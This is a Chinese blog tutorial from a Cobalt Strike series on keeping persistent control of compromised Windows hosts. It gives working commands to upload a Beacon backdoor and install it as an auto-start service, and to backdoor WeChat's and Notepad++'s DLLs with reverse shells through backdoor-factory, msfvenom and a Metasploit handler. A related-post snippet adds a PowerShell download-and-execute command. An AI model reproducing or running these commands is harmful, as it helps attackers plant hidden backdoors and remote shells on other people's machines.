Cobaltstrike系列教程(十三)控制持久化

已于 2023-02-15 13:23:17 修改
阅读量5.4k 收藏 21
点赞数 4
分类专栏: 网络安全 神兵利器 文章标签: 安全 web安全 网络
于 2020-01-19 21:41:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26091745/article/details/104045449
版权

0x000-前文

有技术交流或渗透测试培训需求的朋友欢迎联系QQ/VX-547006660,需要代码审计、渗透测试、红蓝对抗网络安全相关业务可以咨询我

2000人网络安全交流群,欢迎大佬们来玩
群号820783253

0x001-右键菜单实现控制持久化

在windows中,拿到目标主机权限后,,维持权限是必不可少的工作。
目前常见的手法有:

1.注册表
2.启动项
3.计时任务
4.设置服务
5.shift后门
6.dll劫持(白加黑)
7.利用其他安装的软件

在我之前给出的插件中,已经包含了控制持久化的插件
如图,里面包含了很多控制持久化的方法,可自动执行
在这里插入图片描述
前几个Persist(※)貌似都是劫持关键程序的dll实现控制持久化
Sticky Keys是大家熟悉的粘滞键后门(shift后门,摁五下shift弹出cmd窗口)
Scheduled Job方法为写计划任务维持权限
最后一个我也没整明白什么意思,大牛们知道嘛?
利用这个菜单实现控制持久化虽然方便,但是存在一定的局限,也有很多问题,下面简单讲两种个人常用的维持权限的方法

0x002-Windows Service维持权限

在cobaltstrike中生成一个Windows service服务后门
在这里插入图片描述
导出时后门名为beacon.exe
在这里插入图片描述
随后在beacon中执行如下命令

beacon> cd C:\WINDOWS\Temp\
[] cd C:\WINDOWS\Temp\
[+] host called home, sent: 24 bytes

beacon> upload /root/beacon.exe
[] Tasked beacon to upload /root/beacon.exe as beacon.exe
[+] host called home, sent: 309782 bytes
beacon> shell sc create "thisisserver" binpath= "C:\WINDOWS\Temp\beacon.exe"
[] Tasked beacon to run: sc create "thisisserver" binpath= "C:\WINDOWS\Temp\beacon.exe"
[+] host called home, sent: 93 bytes
[+] received output:
[SC] CreateService 成功

beacon> shell sc description "thisisserver" "description"
[] Tasked beacon to run: sc description "thisisserver" "description"
[+] host called home, sent: 74 bytes
[+] received output:
[SC] ChangeServiceConfig2 成功

beacon> shell sc config "thisisserver" start= auto
[] Tasked beacon to run: sc config "thisisserver" start= auto
[+] host called home, sent: 67 bytes
[+] received output:
[SC] ChangeServiceConfig 成功

beacon> shell net start "thisisserver"
[] Tasked beacon to run: net start "thisisserver"
[+] host called home, sent: 55 bytes*

这样的话目标机每次开机,都会运行你的beacon.exe后门,实现控制的持久化。
当然,如果目标主机存在杀毒全家桶的话,那么对你后门的免杀是有很高要求的,至于cobaltstrike后门的免杀,打算过一段时间做个番外篇讲,老铁们可以关注下~

0x003-dll劫持(白加黑)维持权限

Dll劫持的话,主要是劫持那些经常运行程序的dll,这样程序一运行,就会加载我们的恶意dll。实现控制持久化

我们来看一个例子,劫持微信的dll

首先使用Process Explore查看微信调用的dll
在这里插入图片描述
本次测试,是劫持的他的d3dcompiler_47.dll
使用backdoor factory制作dll后门(保存在目录的backdoored文件夹下)
链接:https://github.com/secretsquirrel/the-backdoor-factory
命令如下

python backdoor.py -f d3dcompiler_47.dll -s reverse_shell_tcp_inline -P 6666 -H 8.8.8.8(你的teamserver)

在这里插入图片描述
把这个加了后门的dll放到微信程序的文件夹下
用cobaltstrike配置一个tcp协议监听6666端口的Listener,或者nc监听6666端口,目标机运行微信时,即可收到反弹的shell

再看一个,劫持notepad的dll:
我们首先打开Kali,用Metasploit或者cobaltstrike来生成一个dll木马

Metasploit生成dll后门命令

msfVENOM -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.199.107 lport=6666 -f dll > ./Msimg32.dll

Cobaltstrike生成dll后门方法

在这里插入图片描述
然后配置6666端口的监听
Metasploit:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.199.107
set lport 6666
exploit

Cobaltstrike配置监听
请看教程第二节

然后我们把dll放到notepad文件夹中,运行notpad++,即可返回会话。

在这里插入图片描述

0x004-小福利

分享一下今天刚刚买的1000多套PPT模板,有了这些模板,做课件轻轻松松~
回复即可下载
在这里插入图片描述
链接:https://pan.baidu.com/s/1SGCyFtuQsd0yzKAIMvRLyQ
提取码:6x55

J0o1ey
关注
  • 4
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
Redis教程(十):持久详解
12-16
一、Redis提供了哪些持久机制:  1). RDB持久:  该机制是指在指定的时间间隔内将内存中的数据集快照写入磁盘。   2). AOF持久:  该机制将以日志的形式记录服务器所处理的每一个写操作,在Redis服务器...
CobalStrike批量上线后的权限维持和信息收集~
Ms08067安全实验室
01-11 857
出品|MS08067实验室本文作者:BlackCat(Ms08067内网安全小组成员)BlackCat微信(欢迎骚扰交流):前言:昨天做CS批量上线的时候发现,内网渗透的本质都是信息收集...
全网最全的Cobalt Strike使用教程-进阶篇
喜欢Python编程的程序员柚柚呀
08-17 5715
在这篇文章中,斗哥将详细介绍一下Cobalt Strike的各个模块是干什么的以及部分模块的具体使用方式。
2024年网络安全最新Cobalt Strike渗透神器详解,2024年最新已有千人收藏
最新发布
2401_84302655的博客
05-12 1080
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
CS插件——CobaltStrike_CNA-权限维持
2301_76786857的博客
12-08 1458
EasyPersistent,是一个用于windows系统上权限维持的Cobalt Strike CNA 脚本。脚本整合了一些常用的权限维持方法,使用反射DLL模块可使用API对系统服务、计划任务等常见权限维持方法进行可视操作(强烈建议使用白名单进程进行操作)。
CobaltStrike使用教程详解(基础)
逍遥小哥的博客
07-14 1万+
大家好,今天简单来聊聊CobaltStrike,这是我们后渗透阶段必不可少的神器。Cobalt Strike 是一款流行的渗透测试工具,广泛用于红队操作和渗透测试。它由Raphael Mudge创立的Strategic Cyber LLC开发,并于2012年首次发布。Cobalt Strike 提供了一套功能强大的工具和框架,用于模拟网络攻击、横向移动、特权升级、持久访问以及命令和控制等任务。它旨在帮助安全专业人员评估和改善组织的网络防御能力,同时提供了完整的红队操作平台。
cobaltstrike权限维持
weixin_45682070的博客
06-13 1623
权限维持:简单来说就是让我们可以更久的控制一台电脑 生成监听后门:提权之后我们要创建一个监听后门 shell sc create "ALGS" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.17.142:80/a'))\" #生成一个ALGS服务 shell SC config "ALGS" start= au
CobaltStrike木马免杀代码篇之python反序列分离免杀(一)
xf555er的博客
11-21 1778
本篇文章主要用到python来对CobaltStrike生成的Shellcode进行分离免杀处理, 因此要求读者要有一定的python基础, 下面我会介绍pyhon反序列免杀所需用到的相关函数和库
cobalt strike 4.7
06-07
为了充分利用Cobalt Strike 4.7,使用者需要对网络攻击的生命周期有深入理解,包括侦察、持久、权限提升、防御规避、凭证访问、横向移动、收集和外联。此外,熟悉相关的操作系统和网络协议知识,以及基本的编程和...
CobaltStrike4.1
03-10
三、Cobalt Strike的组件 1. **Team Server**:是Cobalt Strike的核心,负责管理Beacon会话、存储数据和执行任务。 2. **Beacon**:是植入到目标系统中的轻量级代理,用于执行命令、收集信息和进行横向移动。 3. **...
BadUSB简单免杀一秒上线CobaltStrike.pdf
03-24
BadUSB简单免杀一秒上线CobaltStrike.pdf
cobaltstrike4.0
06-26
4. **集成第三方工具**:"third-party"这个文件夹可能包含了Cobalt Strike与第三方工具的整合,如Metasploit框架或其他情报收集工具,这可以扩展其功能范围,提高红队操作的效率。 5. **更新的文档**:通常,新版本...
CobaltStrike 上线到权限维持
Nocker888的博客
05-10 1403
CobaltStrike 上线到权限维持 Win系统上常用计划任务或注册表自启动,或者 ”白+黑” 的方法来达到权限维持的目的 自启动服务 前情提要: 权限要求:system权限 准备免杀马子,上传自定义路径 sc create "GoGo" binpath= "C:\Users\Arks7\Desktop\BypassMM\Exp.exe(路径)" sc description "GoGo" "360SB" sc config "GoGo" start= auto net start "GoGo"
Cobalt Strike小技巧——后台挂起CS服务端
weixin_46622976的博客
08-29 1363
Cobalt Strike
Cobaltstrike系列教程(十)安装扩展
J0o1ey Blog
03-25 9988
0x001-扩展的加载 扩展是Cobaltstrike一个极为重要的模块,它有效地丰盈了cobaltstrike的功能 选择菜单栏的CobaltStrike–>脚本管理器,点击load,然后选择cna扩展文件即可,旁边的unload为去除该扩展...
Cobalt Strike渗透神器详解
读书 买花 长大
06-27 2301
cobalt strike
CobaltStrike之内网穿透(Socks 隧道)
2301_76227305的博客
02-03 1304
众所周知,公网是无法直接访问内网的。但是如果我们控制了一台处于内网和公网边缘的服务器(就是同时有公网IP和私网IP),那么我们便可以利用这个服务器当作跳板,实现对目标内网的访问。之前一直不是很清楚内网与公网这个联系,通过自己搭建环境和配置ip,收获了很多知识。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
2024年全国职业技能大赛“网络安全赛项”国赛 模块B 任务解析(超详细)_2024年全国职业院校技能大赛高职组“网络空间安全(1)
2401_84247559的博客
04-26 517
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。,毕竟实战是检验真理的唯一标准嘛~最后就是项目实战,这里带来的是。
Cobalt Strike使用教程
热门推荐
迷风小白
10-24 7万+
0x00 简介 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike集...
CobaltStrike后门
08-25
Cobalt Strike的后门功能主要是用来在目标系统上建立持久访问并保持对系统的控制。它可以通过多种方式植入后门,例如使用漏洞利用、社会工程学攻击或者钓鱼等手段。一旦后门建立成功,攻击者就能够远程访问目标系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

J0o1ey

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值